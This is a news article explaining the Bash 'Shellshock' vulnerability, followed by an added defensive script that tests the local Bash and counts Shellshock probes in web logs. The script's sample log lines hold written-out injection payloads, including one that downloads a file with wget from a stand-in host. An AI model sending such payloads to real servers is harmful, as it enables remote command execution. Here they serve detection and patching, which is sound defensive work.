A major new security vulnerability affecting the Bash shell is being touted as the most dangerous threat to Internet security yet.
A major new security vulnerability has been discovered which threatens to affect a vast swathe of computing systems, including Web hosts, cloud services and even Internet-connected devices. Referred to as the Bash or Shellshock bug, it is already being touted as the most dangerous threat to Internet security, as well as “bigger than Heartbleed.”
The Bash bug affects the popular Bash shell up to and including version 4.3, and was discovered by software developer Stephane Chazelas. The 22-year-old flaw dates back to version 1.13 and relates to how Bash handles environment variables. Bash lets a function be passed to child processes through an environment variable whose value begins with “() {”; when a vulnerable version imports such a variable, it also executes any code that trails the function definition, opening the door to code-injection attacks from anything that lets an attacker set an environment variable.
The danger stems from the many programs that invoke the Bash shell behind the scenes and hand it attacker-controlled data through the environment (a CGI web server, for instance, places request headers such as the User-Agent into the environment of the script it runs). According to security expert Robert Graham, the Bash bug is bigger than Heartbleed because “the bug interacts with other software in unexpected ways” and because an “enormous percentage” of software interacts with the shell.
“We’ll never be able to catalogue all the software out there that is vulnerable to the Bash bug,” Graham told CNET. “While the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable.”
The Bash shell is found in a number of operating systems, including Linux, Unix and even Apple’s OS X, which has its roots in Unix. Indeed, a test by Ars Technica found that OS X Mavericks shipped a vulnerable version of Bash. There is also concern that it could affect the iPhone DHCP service, and that it could be turned into a worm, self-replicating malware that could corrupt or disable tens of thousands of servers.
One of the most succinct summations of the Bash bug came in via email from Dan Ingevaldson, CTO at Easy Solutions.
“This bug is not a remote ‘code execution’ vulnerability–which means that some tricks are required to actually do something interesting,” wrote Ingevaldson. “It’s a remote ‘command execution’ vulnerability that may allow remote attackers to simply run commands on the remote system. No crashes, no complexity, easy to test, easy to exploit. On the CVSS scale it’s all 10s across the board.”
Hackers are already exploiting the Bash vulnerability, and some reports have noted that the first attacks started within 4.5 hours of its public announcement. As such, systems administrators should patch without delay, and then verify that the installed Bash is actually fixed rather than trusting the package version alone.
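Two checks a practitioner will want for the mechanism described above and for the in-the-wild attacks: whether the local Bash still imports trailing code from a function-valued environment variable, and whether web-server logs already carry the “() {” marker that Shellshock payloads need. The script below is an added example, not code from the original article or from the Bash project; the function and variable names and the access-log lines are constructed for this illustration.

```shell
#!/bin/sh
# Added example (not from the original article). Two practitioner checks for
# the Bash "Shellshock" bug:
#   1. is_bash_vulnerable  - runs the well-known one-liner against the local bash.
#   2. looks_like_shellshock / count_shellshock_hits - flag request or log lines
#      carrying the "() {" marker an exploit must send, the same pattern early
#      IDS signatures matched on.
# Function names and the sample log lines are constructed for this example.

# Returns 0 if the local bash executes trailing code from a function-valued
# environment variable (vulnerable), 1 if it does not, 2 if bash is absent.
is_bash_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 2
    # The value starts with "() {", so bash treats it as an exported function;
    # an unpatched bash also runs the "echo vulnerable" that follows the body.
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) return 0 ;;
        *) return 1 ;;
    esac
}

# Returns 0 if the given line contains "()" followed by "{" (whitespace allowed
# in between), the shape every Shellshock payload has to start with; 1 otherwise.
looks_like_shellshock() {
    printf '%s\n' "$1" | grep -Eq '\([[:space:]]*\)[[:space:]]*\{'
}

# Reads log lines on stdin and prints how many look like Shellshock probes.
# Usage: count_shellshock_hits < /var/log/apache2/access.log
count_shellshock_hits() {
    n=0
    while IFS= read -r line; do
        if looks_like_shellshock "$line"; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# Constructed Apache-style access-log lines: two probes, one ordinary request.
SAMPLE_LOG='10.0.0.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c \"id\""
10.0.0.6 - - [25/Sep/2014:10:12:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux)"
10.0.0.7 - - [25/Sep/2014:10:12:03 +0000] "GET /cgi-bin/test HTTP/1.1" 200 300 "() {:;}; echo; /usr/bin/wget http://example.invalid/x" "curl/7.30"'

if is_bash_vulnerable; then
    echo "local bash: VULNERABLE - patch now"
else
    echo "local bash: not vulnerable (or bash not installed)"
fi
echo "suspicious log lines: $(printf '%s\n' "$SAMPLE_LOG" | count_shellshock_hits)"
```

The log filter is deliberately crude: it catches the marker in any field (User-Agent, Referer, Cookie, request line), which is what matters, since an attacker can choose any header that a CGI server copies into the environment. A patched Bash prints only “test” for the first check; a Bash that echoes “vulnerable” needs updating before anything else.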